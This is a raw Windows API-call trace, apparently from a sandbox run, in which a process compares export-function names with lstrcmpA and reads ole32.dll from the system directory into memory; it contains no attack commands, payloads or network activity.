[0134.965] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.966] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.967] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0134.968] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0134.968] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0134.968] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0134.969] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0134.969] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.970] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0134.971] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0134.972] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0134.972] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0134.973] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0135.438] GetProcessHeap () returned 0x470000 [0135.438] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d92010 | out: hHeap=0x470000) returned 1 [0135.444] GetProcessHeap () returned 0x470000 [0135.444] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489d70 [0135.446] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0135.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0135.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0135.446] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0135.446] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0135.447] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0135.447] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0135.447] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0135.447] GetProcessHeap () returned 0x470000 [0135.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x142d00) returned 0x415e040 [0135.450] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0135.450] ReadFile (in: hFile=0x140, lpBuffer=0x415e040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x415e040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0135.602] CloseHandle (hObject=0x140) returned 1 [0135.602] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0135.602] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", 